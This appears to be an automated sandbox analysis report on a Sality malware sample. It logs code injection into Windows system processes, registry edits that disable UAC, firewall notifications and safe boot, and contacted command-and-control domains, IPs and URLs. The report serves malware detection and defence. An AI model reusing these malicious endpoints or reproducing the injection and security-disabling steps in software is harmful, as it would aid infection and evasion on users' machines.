            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 460000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 89A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 970000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 120000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: CF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 630000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 760000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: B90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 470000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: C90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 350000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 640000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 770000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: BA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 480000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: CA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 990000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: D10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 360000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 650000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 490000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: CB0000Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: C:\Windows\System32\sihost.exe base: EC0000Jump to behavior
            Source: dwm.exe, 00000005.00000000.1391611008.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.2910871589.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: explorer.exe, 0000000A.00000000.1437867129.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2634147825.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128E329 MultiByteToWideChar,RtlEnterCriticalSection,GetLocalTime,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,GetFileTime,CreateFileMappingA,MapViewOfFile,lstrcpyn,lstrcmpiA,GlobalAlloc,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,GetTickCount,GlobalAlloc,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,WriteFile,GlobalFree,SetFileTime,CloseHandle,SetFileAttributesA,DeleteFileA,GlobalFree,RtlLeaveCriticalSection,Sleep,0_2_0128E329
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01293B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,0_2_01293B60
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Changes security center settings (notifications, updates, antivirus, firewall)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
            Deletes keys which are related to windows safe boot (disables safe mode boot)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
            Disables UAC (registry)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Disables user account control notifications
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
            Modifies the windows firewall
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
            Modifies the windows firewall notifications settings
            Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected Metasploit Payload
            Source: Yara matchFile source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_012883C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread,0_2_012883C9
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01287A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,0_2_01287A3A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure12
            Replication Through Removable Media            		1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		6
            Disable or Modify Tools            		1
            Credential API Hooking            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            Inhibit System Recovery
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            Windows Service            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Bypass User Account Control            		2
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Access Token Manipulation            		2
            Software Packing            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Windows Service            		1
            DLL Side-Loading            		LSA Secrets24
            System Information Discovery            		SSHKeylogging12
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts52
            Process Injection            		1
            Bypass User Account Control            		Cached Domain Credentials541
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            File Deletion            		DCSync351
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Masquerading            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Access Token Manipulation            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd52
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536844 Sample: PfBjDhHzvV.exe Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 34 padrup.com 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 12 other signatures 2->48 7 PfBjDhHzvV.exe 501 27 2->7         started        signatures3 process4 dnsIp5 36 189.25.42.209, 1338, 49725, 49765 TelemarNorteLesteSABR Brazil 7->36 38 padrup.com 185.53.178.50, 49731, 49758, 49783 TEAMINTERNET-ASDE Germany 7->38 40 49 other IPs or domains 7->40 22 C:\taqcpb.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\Local\Temp\xlroe.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\Temp\xjjalq.exe, PE32 7->26 dropped 28 2 other malicious files 7->28 dropped 50 Query firmware table information (likely to detect VMs) 7->50 52 Creates autorun.inf (USB autostart) 7->52 54 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->54 56 15 other signatures 7->56 12 faawXJQQDELvfTymNiVz.exe 501 13 7->12 injected 16 SearchApp.exe 7->16 injected 18 faawXJQQDELvfTymNiVz.exe 7->18 injected 20 34 other processes 7->20 file6 signatures7 process8 file9 30 C:\Users\user\AppData\Local\...\winysum.exe, PE32 12->30 dropped 32 C:\Users\user\AppData\Local\...\winbwxmuq.exe, PE32 12->32 dropped 58 Injects code into the Windows Explorer (explorer.exe) 12->58 60 Disables user account control notifications 12->60 62 Writes to foreign memory regions 12->62 64 Allocates memory in foreign processes 12->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->66 68 Found direct / indirect Syscall (likely to bypass EDR) 18->68 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PfBjDhHzvV.exe95%ReversingLabsWin32.Virus.Sality
            PfBjDhHzvV.exe100%AviraW32/Sality.AT
            PfBjDhHzvV.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\winbwxmuq.exe100%AviraW32/Sality.AT
            C:\Users\user\AppData\Local\Temp\winysum.exe100%AviraW32/Sality.AT
            C:\Users\user\AppData\Local\Temp\xjjalq.exe100%AviraW32/Sality.AT
            C:\Users\user\AppData\Local\Temp\xlroe.exe100%AviraW32/Sality.AT
            C:\taqcpb.exe100%AviraW32/Sality.AT
            C:\Users\user\AppData\Local\Temp\winbwxmuq.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\winysum.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\xjjalq.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\xlroe.exe100%Joe Sandbox ML
            C:\taqcpb.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
            https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
            http://schemas.micro0%URL Reputationsafe
            https://graph.windows.net/0%URL Reputationsafe
            https://reactjs.org/docs/error-decoder.html?invariant=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            padrup.com
            		185.53.178.50
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://190.120.227.91:8080/sobakavolos.gif?70c2488=591181480true
                		unknown
                http://padrup.com/sobaka1.gif?8dc219=65031855true
                  		unknown
                  http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062true
                    		unknown
                    http://padrup.com/sobaka1.gif?a66df5=87257000true
                      		unknown
                      http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090true
                        		unknown
                        http://190.120.227.91:8080/sobakavolos.gif?36c07fa=459292624true
                          		unknown
                          http://190.120.227.91:8080/sobakavolos.gif?2c177da=138700686true
                            		unknown
                            http://190.120.227.91:8080/sobakavolos.gif?3fa5859=600644385true
